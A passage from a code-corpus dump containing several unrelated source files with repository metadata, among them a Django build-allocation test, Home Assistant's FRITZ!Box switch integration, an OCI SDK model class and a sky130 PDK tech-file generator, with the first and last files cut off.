self.build.unallocateUntracked()
unallocated = self.build.unallocatedParts(None)
self.assertEqual(len(unallocated), 2)
self.assertFalse(self.build.areUntrackedPartsFullyAllocated())
# Now we "fully" allocate the untracked untracked items
self.allocate_stock(
None,
{
self.stock_1_1: 50,
self.stock_2_1: 50,
}
)
self.assertTrue(self.build.areUntrackedPartsFullyAllocated())
def test_auto_allocate(self):
"""
Test auto-allocation functionality against the build outputs.
Note: auto-allocations only work for un-tracked stock!
"""
allocations = self.build.getAutoAllocations()
self.assertEqual(len(allocations), 1)
self.build.autoAllocate()
self.assertEqual(BuildItem.objects.count(), 1)
# Check that one un-tracked part has been fully allocated to the build
self.assertTrue(self.build.isPartFullyAllocated(self.sub_part_2, None))
self.assertFalse(self.build.isPartFullyAllocated(self.sub_part_1, None))
def test_cancel(self):
"""
Test cancellation of the build
"""
# TODO
"""
self.allocate_stock(50, 50, 200, self.output_1)
self.build.cancelBuild(None)
self.assertEqual(BuildItem.objects.count(), 0)
"""
pass
def test_complete(self):
"""
Test completion of a build output
"""
# Allocate non-tracked parts
self.allocate_stock(
None,
{
self.stock_1_1: self.stock_1_1.quantity, # Allocate *all* stock from this item
self.stock_1_2: 10,
self.stock_2_1: 30
}
)
# Allocate tracked parts to output_1
self.allocate_stock(
self.output_1,
{
self.stock_3_1: 6
}
)
# Allocate tracked parts to output_2
self.allocate_stock(
self.output_2,
{
self.stock_3_1: 14
}
)
self.assertTrue(self.build.isFullyAllocated(None, verbose=True))
self.assertTrue(self.build.isFullyAllocated(self.output_1))
self.assertTrue(self.build.isFullyAllocated(self.output_2))
self.build.completeBuildOutput(self.output_1, None)
self.assertFalse(self.build.can_complete)
self.build.completeBuildOutput(self.output_2, None)
self.assertTrue(self.build.can_complete)
self.build.complete_build(None)
self.assertEqual(self.build.status, status.BuildStatus.COMPLETE)
# the original BuildItem objects should have been deleted!
self.assertEqual(BuildItem.objects.count(), 0)
# New stock items should have been created!
self.assertEqual(StockItem.objects.count(), 7)
# This stock item has been depleted!
with self.assertRaises(StockItem.DoesNotExist):
StockItem.objects.get(pk=self.stock_1_1.pk)
# This stock item has *not* been depleted
x = StockItem.objects.get(pk=self.stock_2_1.pk)
self.assertEqual(x.quantity, 4970)
# And 10 new stock items created for the build output
outputs = StockItem.objects.filter(build=self.build)
self.assertEqual(outputs.count(), 2)
for output in outputs:
self.assertFalse(output.is_building)
| 29.219251 | 107 | 0.60313 |
d96c230351c968101397b97c67c293d8c8150ccb | 856 | py | Python | back-end/sistema_ng/pruebas/mutations.py | BonifacioJZ/sistema-ng | a0d9c5125528a75d723cded454546a815a18f0a7 | [
"MIT"
] | null | null | null | back-end/sistema_ng/pruebas/mutations.py | BonifacioJZ/sistema-ng | a0d9c5125528a75d723cded454546a815a18f0a7 | [
"MIT"
] | 9 | 2021-03-19T02:05:56.000Z | 2022-02-26T18:15:35.000Z | back-end/sistema_ng/pruebas/mutations.py | BonifacioJZ/sistema-ng | a0d9c5125528a75d723cded454546a815a18f0a7 | [
"MIT"
] | null | null | null | import graphene
from .queryM import (CreateUser,Login,CreatePaciente,CreateMedicine,
CreateExpediente,UpdatePaciennte,CreateNote,UpdateExpedient,
UpdateNoteExpedient,DeleteNoteExpedient, DeleteExpedient,
UpdateMedicine,DeleteMedicine)
class Mutation(graphene.ObjectType):
create_actor = CreateUser.Field()
login = Login.Field()
create_paciente = CreatePaciente.Field()
create_medicine = CreateMedicine.Field()
create_expediente = CreateExpediente.Field()
update_expediente = UpdateExpedient.Field()
update_paciente = UpdatePaciennte.Field()
create_note = CreateNote.Field()
update_note_expedient = UpdateNoteExpedient.Field()
delete_note_expedient = DeleteNoteExpedient.Field()
delete_expedient = DeleteExpedient.Field()
update_medicine = UpdateMedicine.Field()
delete_medicine = DeleteMedicine.Field() | 42.8 | 68 | 0.795561 |
91564448c453f9b678f6e6835d012014db8d68a3 | 557 | py | Python | venv/Lib/site-packages/matplotlib/backends/backend_qt5.py | arnoyu-hub/COMP0016miemie | 59af664dcf190eab4f93cefb8471908717415fea | [
"MIT"
] | null | null | null | venv/Lib/site-packages/matplotlib/backends/backend_qt5.py | arnoyu-hub/COMP0016miemie | 59af664dcf190eab4f93cefb8471908717415fea | [
"MIT"
] | null | null | null | venv/Lib/site-packages/matplotlib/backends/backend_qt5.py | arnoyu-hub/COMP0016miemie | 59af664dcf190eab4f93cefb8471908717415fea | [
"MIT"
] | null | null | null | from .backend_qt import (
backend_version, SPECIAL_KEYS,
# Public API
cursord, _create_qApp, _BackendQT, TimerQT, MainWindow, FigureCanvasQT,
FigureManagerQT, ToolbarQt, NavigationToolbar2QT, SubplotToolQt,
SaveFigureQt, ConfigureSubplotsQt, SetCursorQt, RubberbandQt,
HelpQt, ToolCopyToClipboardQT,
# internal re-exports
FigureCanvasBase, FigureManagerBase, MouseButton, NavigationToolbar2,
TimerBase, ToolContainerBase, figureoptions, Gcf
)
@_BackendQT.export
class _BackendQT5(_BackendQT):
pass
| 32.764706 | 76 | 0.755835 |
a0d8c2fbd36cb5161bc09f53556ff7f65b2a9bd0 | 897 | py | Python | team_9/cocos/test/test_scaleby.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | 1 | 2019-09-15T18:59:49.000Z | 2019-09-15T18:59:49.000Z | team_9/cocos/test/test_scaleby.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | null | null | null | team_9/cocos/test/test_scaleby.py | Donnyvdm/dojo19 | 3cf043a84e3ad6d3c4d59cd9c50b160e1ff03400 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import division, print_function, unicode_literals
# This code is so you can run the samples without installing the package
import sys
import os
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
#
testinfo = "t 0.1, s, t 1, s, t 2.1, s, q"
tags = "ScaleBy"
import cocos
from cocos.director import director
from cocos.actions import ScaleBy
from cocos.sprite import Sprite
import pyglet
class TestLayer(cocos.layer.Layer):
def __init__(self):
super( TestLayer, self ).__init__()
x,y = director.get_window_size()
self.sprite = Sprite( 'grossini.png', (x//2, y//2), scale = 0.1 )
self.add( self.sprite )
self.sprite.do( ScaleBy( 10, 2 ) )
def main():
director.init()
test_layer = TestLayer ()
main_scene = cocos.scene.Scene (test_layer)
director.run (main_scene)
if __name__ == '__main__':
main()
| 24.916667 | 73 | 0.6767 |
cac6e735a8191af32c2170ea10c44a646aba975e | 19,728 | py | Python | homeassistant/components/fritz/switch.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 3 | 2021-11-22T22:37:43.000Z | 2022-03-17T00:55:28.000Z | homeassistant/components/fritz/switch.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 1,016 | 2019-06-18T21:27:47.000Z | 2020-03-06T11:09:58.000Z | homeassistant/components/fritz/switch.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 3 | 2022-01-02T18:49:54.000Z | 2022-01-25T02:03:54.000Z | """Switches for AVM Fritz!Box functions."""
from __future__ import annotations
import logging
from typing import Any
import xmltodict
from homeassistant.components.network import async_get_source_ip
from homeassistant.components.switch import SwitchEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.device_registry import CONNECTION_NETWORK_MAC
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import DeviceInfo, Entity, EntityCategory
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.util import slugify
from .common import (
AvmWrapper,
FritzBoxBaseEntity,
FritzData,
FritzDevice,
FritzDeviceBase,
SwitchInfo,
device_filter_out_from_trackers,
)
from .const import (
DATA_FRITZ,
DOMAIN,
SWITCH_TYPE_DEFLECTION,
SWITCH_TYPE_PORTFORWARD,
SWITCH_TYPE_PROFILE,
SWITCH_TYPE_WIFINETWORK,
WIFI_STANDARD,
MeshRoles,
)
_LOGGER = logging.getLogger(__name__)
def deflection_entities_list(
avm_wrapper: AvmWrapper, device_friendly_name: str
) -> list[FritzBoxDeflectionSwitch]:
"""Get list of deflection entities."""
_LOGGER.debug("Setting up %s switches", SWITCH_TYPE_DEFLECTION)
deflections_response = avm_wrapper.get_ontel_num_deflections()
if not deflections_response:
_LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_DEFLECTION)
return []
_LOGGER.debug(
"Specific %s response: GetNumberOfDeflections=%s",
SWITCH_TYPE_DEFLECTION,
deflections_response,
)
if deflections_response["NewNumberOfDeflections"] == 0:
_LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_DEFLECTION)
return []
if not (deflection_list := avm_wrapper.get_ontel_deflections()):
return []
items = xmltodict.parse(deflection_list["NewDeflectionList"])["List"]["Item"]
if not isinstance(items, list):
items = [items]
return [
FritzBoxDeflectionSwitch(avm_wrapper, device_friendly_name, dict_of_deflection)
for dict_of_deflection in items
]
def port_entities_list(
avm_wrapper: AvmWrapper, device_friendly_name: str, local_ip: str
) -> list[FritzBoxPortSwitch]:
"""Get list of port forwarding entities."""
_LOGGER.debug("Setting up %s switches", SWITCH_TYPE_PORTFORWARD)
entities_list: list[FritzBoxPortSwitch] = []
if not avm_wrapper.device_conn_type:
_LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_PORTFORWARD)
return []
# Query port forwardings and setup a switch for each forward for the current device
resp = avm_wrapper.get_num_port_mapping(avm_wrapper.device_conn_type)
if not resp:
_LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_DEFLECTION)
return []
port_forwards_count: int = resp["NewPortMappingNumberOfEntries"]
_LOGGER.debug(
"Specific %s response: GetPortMappingNumberOfEntries=%s",
SWITCH_TYPE_PORTFORWARD,
port_forwards_count,
)
_LOGGER.debug("IP source for %s is %s", avm_wrapper.host, local_ip)
for i in range(port_forwards_count):
portmap = avm_wrapper.get_port_mapping(avm_wrapper.device_conn_type, i)
if not portmap:
_LOGGER.debug("The FRITZ!Box has no %s options", SWITCH_TYPE_DEFLECTION)
continue
_LOGGER.debug(
"Specific %s response: GetGenericPortMappingEntry=%s",
SWITCH_TYPE_PORTFORWARD,
portmap,
)
# We can only handle port forwards of the given device
if portmap["NewInternalClient"] == local_ip:
port_name = portmap["NewPortMappingDescription"]
for entity in entities_list:
if entity.port_mapping and (
port_name in entity.port_mapping["NewPortMappingDescription"]
):
port_name = f"{port_name} {portmap['NewExternalPort']}"
entities_list.append(
FritzBoxPortSwitch(
avm_wrapper,
device_friendly_name,
portmap,
port_name,
i,
avm_wrapper.device_conn_type,
)
)
return entities_list
def wifi_entities_list(
avm_wrapper: AvmWrapper, device_friendly_name: str
) -> list[FritzBoxWifiSwitch]:
"""Get list of wifi entities."""
_LOGGER.debug("Setting up %s switches", SWITCH_TYPE_WIFINETWORK)
#
# https://avm.de/fileadmin/user_upload/Global/Service/Schnittstellen/wlanconfigSCPD.pdf
#
wifi_count = len(
[
s
for s in avm_wrapper.connection.services
if s.startswith("WLANConfiguration")
]
)
_LOGGER.debug("WiFi networks count: %s", wifi_count)
networks: dict = {}
for i in range(1, wifi_count + 1):
network_info = avm_wrapper.connection.call_action(
f"WLANConfiguration{i}", "GetInfo"
)
# Devices with 4 WLAN services, use the 2nd for internal communications
if not (wifi_count == 4 and i == 2):
networks[i] = {
"ssid": network_info["NewSSID"],
"bssid": network_info["NewBSSID"],
"standard": network_info["NewStandard"],
"enabled": network_info["NewEnable"],
"status": network_info["NewStatus"],
}
for i, network in networks.copy().items():
networks[i]["switch_name"] = network["ssid"]
if len([j for j, n in networks.items() if n["ssid"] == network["ssid"]]) > 1:
networks[i]["switch_name"] += f" ({WIFI_STANDARD[i]})"
_LOGGER.debug("WiFi networks list: %s", networks)
return [
FritzBoxWifiSwitch(
avm_wrapper, device_friendly_name, index, data["switch_name"]
)
for index, data in networks.items()
]
def profile_entities_list(
avm_wrapper: AvmWrapper,
data_fritz: FritzData,
) -> list[FritzBoxProfileSwitch]:
"""Add new tracker entities from the AVM device."""
_LOGGER.debug("Setting up %s switches", SWITCH_TYPE_PROFILE)
new_profiles: list[FritzBoxProfileSwitch] = []
if "X_AVM-DE_HostFilter1" not in avm_wrapper.connection.services:
return new_profiles
if avm_wrapper.unique_id not in data_fritz.profile_switches:
data_fritz.profile_switches[avm_wrapper.unique_id] = set()
for mac, device in avm_wrapper.devices.items():
if device_filter_out_from_trackers(
mac, device, data_fritz.profile_switches.values()
):
_LOGGER.debug(
"Skipping profile switch creation for device %s", device.hostname
)
continue
new_profiles.append(FritzBoxProfileSwitch(avm_wrapper, device))
data_fritz.profile_switches[avm_wrapper.unique_id].add(mac)
_LOGGER.debug("Creating %s profile switches", len(new_profiles))
return new_profiles
def all_entities_list(
avm_wrapper: AvmWrapper,
device_friendly_name: str,
data_fritz: FritzData,
local_ip: str,
) -> list[Entity]:
"""Get a list of all entities."""
if avm_wrapper.mesh_role == MeshRoles.SLAVE:
return []
return [
*deflection_entities_list(avm_wrapper, device_friendly_name),
*port_entities_list(avm_wrapper, device_friendly_name, local_ip),
*wifi_entities_list(avm_wrapper, device_friendly_name),
*profile_entities_list(avm_wrapper, data_fritz),
]
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up entry."""
_LOGGER.debug("Setting up switches")
avm_wrapper: AvmWrapper = hass.data[DOMAIN][entry.entry_id]
data_fritz: FritzData = hass.data[DATA_FRITZ]
_LOGGER.debug("Fritzbox services: %s", avm_wrapper.connection.services)
local_ip = await async_get_source_ip(avm_wrapper.hass, target_ip=avm_wrapper.host)
entities_list = await hass.async_add_executor_job(
all_entities_list,
avm_wrapper,
entry.title,
data_fritz,
local_ip,
)
async_add_entities(entities_list)
@callback
def update_avm_device() -> None:
"""Update the values of the AVM device."""
async_add_entities(profile_entities_list(avm_wrapper, data_fritz))
entry.async_on_unload(
async_dispatcher_connect(hass, avm_wrapper.signal_device_new, update_avm_device)
)
class FritzBoxBaseSwitch(FritzBoxBaseEntity):
"""Fritz switch base class."""
_attr_is_on: bool | None = False
def __init__(
self,
avm_wrapper: AvmWrapper,
device_friendly_name: str,
switch_info: SwitchInfo,
) -> None:
"""Init Fritzbox port switch."""
super().__init__(avm_wrapper, device_friendly_name)
self._description = switch_info["description"]
self._friendly_name = switch_info["friendly_name"]
self._icon = switch_info["icon"]
self._type = switch_info["type"]
self._update = switch_info["callback_update"]
self._switch = switch_info["callback_switch"]
self._name = f"{self._friendly_name} {self._description}"
self._unique_id = f"{self._avm_wrapper.unique_id}-{slugify(self._description)}"
self._attributes: dict[str, str] = {}
self._is_available = True
@property
def name(self) -> str:
"""Return name."""
return self._name
@property
def icon(self) -> str:
"""Return name."""
return self._icon
@property
def unique_id(self) -> str:
"""Return unique id."""
return self._unique_id
@property
def available(self) -> bool:
"""Return availability."""
return self._is_available
@property
def extra_state_attributes(self) -> dict[str, str]:
"""Return device attributes."""
return self._attributes
async def async_update(self) -> None:
"""Update data."""
_LOGGER.debug("Updating '%s' (%s) switch state", self.name, self._type)
await self._update()
async def async_turn_on(self, **kwargs: Any) -> None:
"""Turn on switch."""
await self._async_handle_turn_on_off(turn_on=True)
async def async_turn_off(self, **kwargs: Any) -> None:
"""Turn off switch."""
await self._async_handle_turn_on_off(turn_on=False)
async def _async_handle_turn_on_off(self, turn_on: bool) -> None:
"""Handle switch state change request."""
await self._switch(turn_on)
self._attr_is_on = turn_on
class FritzBoxPortSwitch(FritzBoxBaseSwitch, SwitchEntity):
"""Defines a FRITZ!Box Tools PortForward switch."""
def __init__(
self,
avm_wrapper: AvmWrapper,
device_friendly_name: str,
port_mapping: dict[str, Any] | None,
port_name: str,
idx: int,
connection_type: str,
) -> None:
"""Init Fritzbox port switch."""
self._avm_wrapper = avm_wrapper
self._attributes = {}
self.connection_type = connection_type
self.port_mapping = port_mapping # dict in the format as it comes from fritzconnection. eg: {'NewRemoteHost': '0.0.0.0', 'NewExternalPort': 22, 'NewProtocol': 'TCP', 'NewInternalPort': 22, 'NewInternalClient': '192.168.178.31', 'NewEnabled': True, 'NewPortMappingDescription': 'Beast SSH ', 'NewLeaseDuration': 0}
self._idx = idx # needed for update routine
self._attr_entity_category = EntityCategory.CONFIG
if port_mapping is None:
return
switch_info = SwitchInfo(
description=f"Port forward {port_name}",
friendly_name=device_friendly_name,
icon="mdi:check-network",
type=SWITCH_TYPE_PORTFORWARD,
callback_update=self._async_fetch_update,
callback_switch=self._async_switch_on_off_executor,
)
super().__init__(avm_wrapper, device_friendly_name, switch_info)
async def _async_fetch_update(self) -> None:
"""Fetch updates."""
self.port_mapping = await self._avm_wrapper.async_get_port_mapping(
self.connection_type, self._idx
)
_LOGGER.debug(
"Specific %s response: %s", SWITCH_TYPE_PORTFORWARD, self.port_mapping
)
if not self.port_mapping:
self._is_available = False
return
self._attr_is_on = self.port_mapping["NewEnabled"] is True
self._is_available = True
attributes_dict = {
"NewInternalClient": "internal_ip",
"NewInternalPort": "internal_port",
"NewExternalPort": "external_port",
"NewProtocol": "protocol",
"NewPortMappingDescription": "description",
}
for key, attr in attributes_dict.items():
self._attributes[attr] = self.port_mapping[key]
async def _async_switch_on_off_executor(self, turn_on: bool) -> bool:
if self.port_mapping is None:
return False
self.port_mapping["NewEnabled"] = "1" if turn_on else "0"
resp = await self._avm_wrapper.async_add_port_mapping(
self.connection_type, self.port_mapping
)
return bool(resp is not None)
class FritzBoxDeflectionSwitch(FritzBoxBaseSwitch, SwitchEntity):
"""Defines a FRITZ!Box Tools PortForward switch."""
def __init__(
self,
avm_wrapper: AvmWrapper,
device_friendly_name: str,
dict_of_deflection: Any,
) -> None:
"""Init Fritxbox Deflection class."""
self._avm_wrapper = avm_wrapper
self.dict_of_deflection = dict_of_deflection
self._attributes = {}
self.id = int(self.dict_of_deflection["DeflectionId"])
self._attr_entity_category = EntityCategory.CONFIG
switch_info = SwitchInfo(
description=f"Call deflection {self.id}",
friendly_name=device_friendly_name,
icon="mdi:phone-forward",
type=SWITCH_TYPE_DEFLECTION,
callback_update=self._async_fetch_update,
callback_switch=self._async_switch_on_off_executor,
)
super().__init__(self._avm_wrapper, device_friendly_name, switch_info)
async def _async_fetch_update(self) -> None:
"""Fetch updates."""
resp = await self._avm_wrapper.async_get_ontel_deflections()
if not resp:
self._is_available = False
return
self.dict_of_deflection = xmltodict.parse(resp["NewDeflectionList"])["List"][
"Item"
]
if isinstance(self.dict_of_deflection, list):
self.dict_of_deflection = self.dict_of_deflection[self.id]
_LOGGER.debug(
"Specific %s response: NewDeflectionList=%s",
SWITCH_TYPE_DEFLECTION,
self.dict_of_deflection,
)
self._attr_is_on = self.dict_of_deflection["Enable"] == "1"
self._is_available = True
self._attributes["type"] = self.dict_of_deflection["Type"]
self._attributes["number"] = self.dict_of_deflection["Number"]
self._attributes["deflection_to_number"] = self.dict_of_deflection[
"DeflectionToNumber"
]
# Return mode sample: "eImmediately"
self._attributes["mode"] = self.dict_of_deflection["Mode"][1:]
self._attributes["outgoing"] = self.dict_of_deflection["Outgoing"]
self._attributes["phonebook_id"] = self.dict_of_deflection["PhonebookID"]
async def _async_switch_on_off_executor(self, turn_on: bool) -> None:
"""Handle deflection switch."""
await self._avm_wrapper.async_set_deflection_enable(self.id, turn_on)
class FritzBoxProfileSwitch(FritzDeviceBase, SwitchEntity):
"""Defines a FRITZ!Box Tools DeviceProfile switch."""
_attr_icon = "mdi:router-wireless-settings"
def __init__(self, avm_wrapper: AvmWrapper, device: FritzDevice) -> None:
"""Init Fritz profile."""
super().__init__(avm_wrapper, device)
self._attr_is_on: bool = False
self._name = f"{device.hostname} Internet Access"
self._attr_unique_id = f"{self._mac}_internet_access"
self._attr_entity_category = EntityCategory.CONFIG
self._attr_device_info = DeviceInfo(
connections={(CONNECTION_NETWORK_MAC, self._mac)},
default_manufacturer="AVM",
default_model="FRITZ!Box Tracked device",
default_name=device.hostname,
identifiers={(DOMAIN, self._mac)},
via_device=(
DOMAIN,
avm_wrapper.unique_id,
),
)
@property
def is_on(self) -> bool | None:
"""Switch status."""
return self._avm_wrapper.devices[self._mac].wan_access
@property
def available(self) -> bool:
"""Return availability of the switch."""
if self._avm_wrapper.devices[self._mac].wan_access is None:
return False
return super().available
async def async_turn_on(self, **kwargs: Any) -> None:
"""Turn on switch."""
await self._async_handle_turn_on_off(turn_on=True)
async def async_turn_off(self, **kwargs: Any) -> None:
"""Turn off switch."""
await self._async_handle_turn_on_off(turn_on=False)
async def _async_handle_turn_on_off(self, turn_on: bool) -> bool:
"""Handle switch state change request."""
if not self.ip_address:
return False
await self._avm_wrapper.async_set_allow_wan_access(self.ip_address, turn_on)
self.async_write_ha_state()
return True
class FritzBoxWifiSwitch(FritzBoxBaseSwitch, SwitchEntity):
"""Defines a FRITZ!Box Tools Wifi switch."""
def __init__(
self,
avm_wrapper: AvmWrapper,
device_friendly_name: str,
network_num: int,
network_name: str,
) -> None:
"""Init Fritz Wifi switch."""
self._avm_wrapper = avm_wrapper
self._attributes = {}
self._attr_entity_category = EntityCategory.CONFIG
self._network_num = network_num
switch_info = SwitchInfo(
description=f"Wi-Fi {network_name}",
friendly_name=device_friendly_name,
icon="mdi:wifi",
type=SWITCH_TYPE_WIFINETWORK,
callback_update=self._async_fetch_update,
callback_switch=self._async_switch_on_off_executor,
)
super().__init__(self._avm_wrapper, device_friendly_name, switch_info)
async def _async_fetch_update(self) -> None:
"""Fetch updates."""
wifi_info = await self._avm_wrapper.async_get_wlan_configuration(
self._network_num
)
_LOGGER.debug(
"Specific %s response: GetInfo=%s", SWITCH_TYPE_WIFINETWORK, wifi_info
)
if not wifi_info:
self._is_available = False
return
self._attr_is_on = wifi_info["NewEnable"] is True
self._is_available = True
std = wifi_info["NewStandard"]
self._attributes["standard"] = std if std else None
self._attributes["bssid"] = wifi_info["NewBSSID"]
self._attributes["mac_address_control"] = wifi_info[
"NewMACAddressControlEnabled"
]
async def _async_switch_on_off_executor(self, turn_on: bool) -> None:
"""Handle wifi switch."""
await self._avm_wrapper.async_set_wlan_configuration(self._network_num, turn_on)
| 33.838765 | 322 | 0.652372 |
3121125d0795c22780c7be0c12107d22d73545d3 | 3,623 | py | Python | src/oci/database_tools/models/database_tools_key_store_password_summary.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/database_tools/models/database_tools_key_store_password_summary.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | src/oci/database_tools/models/database_tools_key_store_password_summary.py | LaudateCorpus1/oci-python-sdk | b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class DatabaseToolsKeyStorePasswordSummary(object):
"""
The key store password.
"""
#: A constant which can be used with the value_type property of a DatabaseToolsKeyStorePasswordSummary.
#: This constant has a value of "SECRETID"
VALUE_TYPE_SECRETID = "SECRETID"
def __init__(self, **kwargs):
"""
Initializes a new DatabaseToolsKeyStorePasswordSummary object with values from keyword arguments. This class has the following subclasses and if you are using this class as input
to a service operations then you should favor using a subclass over the base class:
* :class:`~oci.database_tools.models.DatabaseToolsKeyStorePasswordSecretIdSummary`
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param value_type:
The value to assign to the value_type property of this DatabaseToolsKeyStorePasswordSummary.
Allowed values for this property are: "SECRETID", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:type value_type: str
"""
self.swagger_types = {
'value_type': 'str'
}
self.attribute_map = {
'value_type': 'valueType'
}
self._value_type = None
@staticmethod
def get_subtype(object_dictionary):
"""
Given the hash representation of a subtype of this class,
use the info in the hash to return the class of the subtype.
"""
type = object_dictionary['valueType']
if type == 'SECRETID':
return 'DatabaseToolsKeyStorePasswordSecretIdSummary'
else:
return 'DatabaseToolsKeyStorePasswordSummary'
@property
def value_type(self):
"""
**[Required]** Gets the value_type of this DatabaseToolsKeyStorePasswordSummary.
The value type of the key store password.
Allowed values for this property are: "SECRETID", 'UNKNOWN_ENUM_VALUE'.
Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.
:return: The value_type of this DatabaseToolsKeyStorePasswordSummary.
:rtype: str
"""
return self._value_type
@value_type.setter
def value_type(self, value_type):
"""
Sets the value_type of this DatabaseToolsKeyStorePasswordSummary.
The value type of the key store password.
:param value_type: The value_type of this DatabaseToolsKeyStorePasswordSummary.
:type: str
"""
allowed_values = ["SECRETID"]
if not value_allowed_none_or_none_sentinel(value_type, allowed_values):
value_type = 'UNKNOWN_ENUM_VALUE'
self._value_type = value_type
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| 36.23 | 245 | 0.687 |
81fedb424577397baee6353db2cc551b902660b4 | 3,077 | py | Python | src/hammer-vlsi/technology/sky130/extra/sky130-tech-gen.py | httpsgithu/hammer | 6099f4169a49f71cee2e24bb1052f273039505cd | [
"BSD-3-Clause"
] | 138 | 2017-08-15T18:56:55.000Z | 2022-03-29T05:23:37.000Z | src/hammer-vlsi/technology/sky130/extra/sky130-tech-gen.py | httpsgithu/hammer | 6099f4169a49f71cee2e24bb1052f273039505cd | [
"BSD-3-Clause"
] | 444 | 2017-09-11T01:15:37.000Z | 2022-03-31T17:30:33.000Z | src/hammer-vlsi/technology/sky130/extra/sky130-tech-gen.py | httpsgithu/hammer | 6099f4169a49f71cee2e24bb1052f273039505cd | [
"BSD-3-Clause"
] | 33 | 2017-10-30T14:23:53.000Z | 2022-03-25T01:36:13.000Z | '''
Purpose: generate the json file required by the Hammer Sky130 tech plugin
Usage:
export PDK_ROOT=<path-to-dir-containing-sky130-setup>
python sky130-tech-gen.py
Output:
sky130.tech.json: specifies Sky130 PDK file locations and various details
'''
import json
import os
from pathlib import Path
use_nda_files=True
library='sky130_fd_sc_hd'
PDK_ROOT = os.getenv('PDK_ROOT')
if PDK_ROOT is None:
print("Error: Must set $PDK_ROOT to the directory that contains skywater-pdk and the root of the sky130A install.")
exit()
SKY130A = os.path.join(PDK_ROOT, 'share/pdk/sky130A')
if use_nda_files:
with open('sky130-tech-gen-files/beginning_nda.json', 'r') as f: data = json.load(f)
else:
with open('sky130-tech-gen-files/beginning.json', 'r') as f: data = json.load(f)
with open('sky130-tech-gen-files/cells.json', 'r') as f:
cells = json.load(f)
data["physical only cells list"] = cells["physical only cells list"]
data["dont use list"] = cells["dont use list"]
data["special cells"] = cells["special cells"]
SKYWATER_LIBS = os.path.join('$SKY130A','libs.ref',library)
LIBRARY_PATH = os.path.join(SKY130A,'libs.ref',library,'lib')
lib_corner_files=os.listdir(LIBRARY_PATH)
for cornerfilename in lib_corner_files:
if (not (library in cornerfilename) ) : continue
if ('ccsnoise' in cornerfilename): continue # ignore duplicate corner.lib/corner_ccsnoise.lib files
tmp = cornerfilename.replace('.lib','')
if (tmp+'_ccsnoise.lib' in lib_corner_files):
cornerfilename=tmp+'_ccsnoise.lib' # use ccsnoise version of lib file
cornername = tmp.split('__')[1]
cornerparts = cornername.split('_')
speed = cornerparts[0]
if (speed == 'ff'): speed = 'fast'
if (speed == 'tt'): speed = 'typical'
if (speed == 'ss'): speed = 'slow'
temp = cornerparts[1]
temp = temp.replace('n','-')
temp = temp.split('C')[0]+' C'
vdd = cornerparts[2]
vdd = vdd.split('v')[0]+'.'+vdd.split('v')[1]+' V'
lib_entry = {
"nldm liberty file": os.path.join(SKYWATER_LIBS,'lib', cornerfilename),
"verilog sim": os.path.join('tech-sky130-cache', library+'.v'),
"lef file": os.path.join(SKYWATER_LIBS,'lef', library+'.lef'),
"spice file": os.path.join('tech-sky130-cache', library+'.cdl'),
"gds file": os.path.join(SKYWATER_LIBS,'gds', library+'.gds'),
"corner": {
"nmos": speed,
"pmos": speed,
"temperature": temp
},
"supplies": {
"VDD": vdd,
"GND": "0 V"
},
"provides": [
{
"lib_type": "stdcell",
"vt": "RVT"
}
]
}
data["libraries"].append(lib_entry)
with open('sky130-tech-gen-files/stackups.json', 'r') as f:
stackups = json.load(f)
data["stackups"] = [stackups]
with open('sky130-tech-gen-files/sites.json', 'r') as f:
sites = json.load(f)
data["sites"] = sites["sites"]
with open('../sky130.tech.json', 'w') as f:
json.dump(data, f, indent=2) | 32.734043 | 119 | 0.620409 |
291e6d9e92986f5444e20f52bfcfd56b0c935484 | 1,879 | py | Python | distance_sensor.py | stephen-allison/pibot | f5128ca5268ab1b29909c7245867646c6c18edbc | [
"CC0-1.0"
] | null | null | null | distance_sensor.py | stephen-allison/pibot | f5128ca5268ab1b29909c7245867646c6c18edbc | [
"CC0-1.0"
] | null | null | null | distance_sensor.py | stephen-allison/pibot | f5128ca5268ab1b29909c7245867646c6c18edbc | [
"CC0-1.0"
] | null | null | null | import RPi.GPIO as GPIO
import time
def measureDistance():
# Set trigger to False (Low)
GPIO.output(pinTrigger, False)
